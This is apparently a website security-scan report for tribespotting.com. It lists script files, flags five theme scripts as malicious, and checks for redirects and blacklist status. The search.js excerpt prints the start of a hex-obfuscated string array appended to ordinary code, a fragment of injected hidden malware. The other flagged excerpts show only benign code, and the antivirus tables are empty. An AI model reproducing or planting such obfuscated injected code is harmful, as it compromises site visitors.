Scanned pages/files
Request | Server response | Status |
http://www.tribespotting.com/ | 200 OK Content-Length: 22556 Content-Type: text/html | clean |
http://tribespotting.stefanolevi.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://tribespotting.stefanolevi.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://tribespotting.stefanolevi.com/wp-content/plugins/jetpack/_inc/postmessage.js?ver=3.1.1 | 200 OK Content-Length: 19615 Content-Type: application/javascript | clean |
http://tribespotting.stefanolevi.com/wp-content/plugins/jetpack/_inc/jquery.inview.js?ver=3.1.1 | 200 OK Content-Length: 5590 Content-Type: application/javascript | clean |
http://tribespotting.stefanolevi.com/wp-content/plugins/jetpack/_inc/jquery.jetpack-resize.js?ver=3.1.1 | 200 OK Content-Length: 8104 Content-Type: application/javascript | clean |
http://tribespotting.stefanolevi.com/wp-content/themes/photo-workshop/includes/js/jquery.cycle.js?ver=4.0 | 200 OK Content-Length: 31068 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below).
Excerpt (cut off mid-statement; what is shown appears to be ordinary script code from the start of the file, so the flagged portion is not visible here):
(function($){var ver="2.72";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){if($.fn.cycle.debug){log(s);}}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length===0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).c
Antivirus reports: (the report table is empty on this page)
http://tribespotting.stefanolevi.com/wp-content/themes/photo-workshop/includes/js/preloader.js?ver=4.0 | 200 OK Content-Length: 2829 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below).
Excerpt (cut off mid-statement; what is shown appears to be ordinary script code from the start of the file, so the flagged portion is not visible here):
(function($) { var imgList = []; $.extend({ preload: function(imgArr, option) { var setting = $.extend({ init: function(loaded, total) {}, loaded: function(img, loaded, total) {}, loaded_all: function(loaded, total) {} }, option); var total = imgArr.length; var loaded = 0; setting.init(0, total); for(var i in imgArr) { imgList.push($("<img />") .attr("src", imgArr[i]) .load(f
Antivirus reports: (the report table is empty on this page)
http://tribespotting.stefanolevi.com/wp-content/themes/photo-workshop/includes/js/nav/superfish.js?ver=4.0 | 200 OK Content-Length: 5920 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below).
Excerpt (cut off mid-statement; what is shown appears to be ordinary script code from the start of the file, so the flagged portion is not visible here):
;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men
Antivirus reports: (the report table is empty on this page)
http://tribespotting.stefanolevi.com/wp-content/themes/photo-workshop/includes/js/nav/supersubs.js?ver=4.0 | 200 OK Content-Length: 5504 Content-Type: application/javascript | clean |
http://tribespotting.stefanolevi.com/wp-content/themes/photo-workshop/includes/js/search.js?ver=4.0 | 200 OK Content-Length: 2980 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below).
Excerpt (cut off; it shows the clearInput helper followed by the start of a hex-escaped string array, _0x4470, which is the only obfuscated fragment visible on this page):
function clearInput(field_id, term_to_clear) { if (document.getElementById(field_id).value == term_to_clear ) { document.getElementById(field_id).value = ''; } else if (document.getElementById(field_id).value == '' ) { document.getElementById(field_id).value = term_to_clear; } } var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28\x67\x2
Antivirus reports: (the report table is empty on this page)
http://tribespotting.stefanolevi.com/wp-content/themes/photo-workshop/includes/js/jquery.custom.js?ver=4.0 | 200 OK Content-Length: 3391 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below).
Excerpt (cut off mid-statement; what is shown appears to be ordinary script code from the start of the file, so the flagged portion is not visible here):
jQuery(document).ready(function(){ jQuery(".pad img").hover(function(){ jQuery(this).fadeTo("slow", 0.6); },function(){ jQuery(this).fadeTo("slow", 1.0); }); jQuery.fn.slideFadeToggle = function(speed, easing, callback) { return this.animate({opacity: 'toggle', height: 'toggle'}, speed, easing, callback); }; jQuery('#show_captions').click( function() { jQuery(".caption").each(function (i) { if (this.style.display == "none")
Antivirus reports: (the report table is empty on this page)
http://tribespotting.stefanolevi.com/wp-includes/js/swfobject.js?ver=2.2-20120417 | 200 OK Content-Length: 10231 Content-Type: application/javascript | clean |
http://app.icontact.com/icp/loadsignup.php/form.js?c=974419&l=46978&f=9174 | 200 OK Content-Length: 2702 Content-Type: text/javascript | clean |
http://tribespotting.stefanolevi.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tribespotting.com
Result: (no result text is shown for this query)
Second query (visit from search engine):
GET / HTTP/1.1
Host: tribespotting.com
Referer: http://www.google.com/search?q=tribespotting.com
Result:
The result is similar to the first query. There are no suspicious redirects found. Only these two request profiles (a direct visit and a visit with a Google search referrer) were tested, so the finding covers those two cases only.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tribespotting.com
Result: This site is not currently listed as suspicious. This is the blacklist status at the time of the query; it is separate from the five scripts reported as malicious in the scan table above.
Query: http://yandex.com/infected?l10n=en&url=http://tribespotting.com/
Result: tribespotting.com is not infected or malware details are not published yet.